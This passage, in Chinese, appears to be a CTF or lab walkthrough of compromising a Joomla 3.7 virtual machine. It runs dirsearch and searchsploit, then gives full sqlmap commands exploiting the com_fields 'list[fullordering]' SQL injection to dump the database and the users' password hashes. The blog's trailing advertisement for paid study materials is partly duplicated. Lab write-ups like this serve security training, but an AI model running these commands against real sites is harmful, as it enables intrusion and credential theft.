二.端口扫描和探测
1.我们发现开通了80端口
2.发现提示
3.访问IP地址得到登录页
4.扫描网站看是否由隐藏目录
dirsearch -u http://10.0.2.19/
5.访问/README.txt和/administrator
在/readme.txt中发现了了是cms结构joomla,我们了解一下joomla
我们在administrator发现了一个登录页面应该是后台登录
三.漏洞利用
1.我们用工具searchsploit 来搜索
1.searchsploit
Searchsploit 是一个开源工具,用于在漏洞数据库中搜索和定位漏洞利用程序。它由 Offensive Security 开发,旨在帮助安全研究人员和渗透测试人员找到漏洞利用程序以及其他安全工具和资源。Searchsploit 可以在本地或远程漏洞数据库中搜索漏洞利用程序,支持各种不同的漏洞数据库格式。该工具还可以通过 Metasploit 框架的接口执行漏洞利用程序,以测试目标系统的安全性。
2.搜索joomla版本3.7的漏洞
3.我们来查看漏洞信息
searchsploit -x php/webapps/42033.txt
说明我们有sql漏洞而且给出了我们如何扫描
1.爆库
sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
2.爆表
sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D ‘joomladb’ --tables -p list[fullordering]
爆出许多表我们用user表
3.爆字段
sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D ‘joomladb’ -T ‘#__users’ --columns -p list[fullordering]
4.我们爆username,和password
sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D ‘joomladb’ -T ‘#__users’ -C ‘username,password’ --dump -p list[fullordering]
得到密码不过密码是hash加密
5.john爆破
6.登陆进去
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-y4CTiLzm-1712482631783)]
297
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
